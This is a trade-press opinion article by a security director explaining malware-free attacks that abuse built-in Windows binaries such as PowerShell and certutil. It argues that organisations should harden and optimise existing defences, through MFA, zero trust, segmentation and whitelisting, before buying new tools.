Optimise or purchase?

Andy Swift at Six Degrees debates whether optimising or purchasing offers better protection against a new wave of malware-free attacks

 

It’s an old threat, reimagined. Just when you thought cyber-security couldn’t get more complex or cyber-criminals more devious, I’m here to tell you that these bad actors have rediscovered a way to circumvent many of our most trusted cyber-security defences and launch attacks without viruses, trojans, or other malware.

 

Although they’re making headlines now, these malware-free attacks - specifically making use of Living Off the Land Binary (LOLBins) and other script-based attack methods - are not new. Their recent resurgence is due to advances in endpoint security that make it more difficult and time-consuming to plant malware. From a broader perspective, it’s part of that war of attrition between IT security teams and cyber-criminals - we strengthen one area, and they look for another vulnerability.

 

So, how do we fight back? I’ll get to that shortly. First, let’s take a deeper look at how malware-free attacks work. Then we’ll be better placed to launch a counter-attack. 

 

The mechanics of a malware-free attack

To make use of a LOLBin as part of an attack chain, first an attacker will need an initial foothold within an organisation’s internal infrastructure; this can be done via the usual old favourites - phishing or border device exploitation, for example. But instead of deploying detectable malware for the purposes of remote access or exfiltration, they may turn to pre-existing, trusted binaries already embedded within the operating system to serve these same purposes. This is far harder to detect because the attackers are not using additional tooling or even introducing something new to an environment. Automated protection, such as traditional signature-based antivirus software, won’t help. 

 

Tools such as PowerShell, WMI, wscript.exe and certutil.exe (the list is extensive and ever growing) are all baked into the operating system and all have legitimate functions. But with clever manipulation, these tools can be reused for malicious purposes as well. As an example, one might identify an option in one of these programs intended to get a local file for parsing a configuration; however, that same option could be used to retrieve a malicious file from an untrusted external source. Generally, these methods abuse inherent flexibility, lack of strict input validation, or overly permissive features.

 

The worst part about this is that these files are often digitally signed with trusted certificates, making detection of their abuse even more problematic.

 

Cost vs risk considerations

The frequency of malware-free attacks is likely to rise because they are far simpler to work into existing attack chains, are already embedded within the operating system, and are reliable compared to a more traditional malware-based attack. This, coupled with their difficulty in detecting and high success rates, makes them an appealing approach. In fact, many cyber-criminal groups - including state-sponsored organisations - now depend exclusively on malware-free attack methods and do not need to create malware to meet their objectives. All these factors suggest a period of rapid evolution and increasingly sophisticated attacks.

 

At first glance, therefore, mounting a defence can seem like an impossible task. After all, any tool capable of transferring data in or out of a system (infiltrate or exfiltrate) could have the potential to become a malware-free attack vector. In situations like this - when a new cyber-attack appears or an old one regains momentum - the initial response from many IT and security teams is to see if they can buy a solution to fix the vulnerability and improve their protection: usually a tool, licence, software, or piece of hardware. But spending is not always necessary - or a priority.

 

That’s why I believe it’s vital to carry out a cost vs risk analysis. Be warned, however, that this approach requires a mindset shift - and perhaps a cultural or departmental shift within an organisation. It means moving from evaluating security tool options to analysing the issues that need fixing and addressing them, potentially with existing tools and processes. But it’s worth the effort, I promise.

 

Take another look at your cyber-security toolbox

I’d start by assessing current tooling and licenses - and understanding their limitations in the context of malware-free attacks. This might include: 

• EDR (Endpoint Detection and Response)
• Behavioural Monitoring
• Identity Protections
• User Behaviour Analytics

For many organisations, the preferred malware-free defence strategy involves advanced EDR tools and 24x7 SOC monitoring - technologies that enable experts to monitor and watch behaviour to identify any inconsistencies that warrant further investigation. But this is expensive, and most companies have not carried out a full implementation - producing somewhat patchy coverage. It’s also worth noting that most EDR tooling and other endpoint preventive measures are easy to bypass once an attacker is in the right place with the right permissions.

 

So, while detection and monitoring are not pointless by any stretch of the imagination, the most significant part of the cost vs risk discussion should ideally focus on prevention and establishing solid foundations. 

 

 

 

Analysis, monitoring and prevention

The best chance of detecting malware-free attacks is through behavioural analysis and system monitoring, so any of these tools, if already in place, can absolutely help. I’d recommend organisations review how they use these tools as they’re often underutilised or not configured to identify an ever-changing attack landscape.  

 

The key here, however, is prevention. If your first alert during a malware-free attack is the malicious use of a legitimate binary, you are already too late. But much can be done before that point with little to no investment in new tooling. It’s often a case of hardening existing systems and significantly reducing the opportunity for attackers to gain the footholds they need. This might include:

• Adopting or strengthening multi-factor authentication (MFA).
• Introducing zero trust modelling and strict privilege management that limits credential misuse.
• Providing organisation-wide education to reduce the likelihood of users unknowingly enabling an attack by following instructions on fake CAPTCHA websites. 
• Implementing network segmentation to make lateral movement as difficult as possible.
• Taking a whitelisting approach to binary access and reducing attack surfaces.

The rise of malware-free attacks

Malware-free attacks are likely to be even more prevalent in the future because they are harder to detect and easier to launch. In most cases, nothing new is imported into the target IT environment, so there’s no smoking gun. As such, shutting an attack down early in its kill chain can be challenging. Many organisations see costs as a barrier to implementing a defence against malware-free attacks.

 

However, significant progress can be made simply by reviewing and optimising existing security tools. This means shifting the conversation from what we should buy to what we should fix. That’s because even the most expensive detection tools, such as EDRs and SOCs, cannot compensate for poor security fundamentals.

 

---

 

Andy Swift is Cyber Security Assurance Technical Director at Six Degrees

 

Main image courtesy of iStockPhoto.com and Alexander Sikov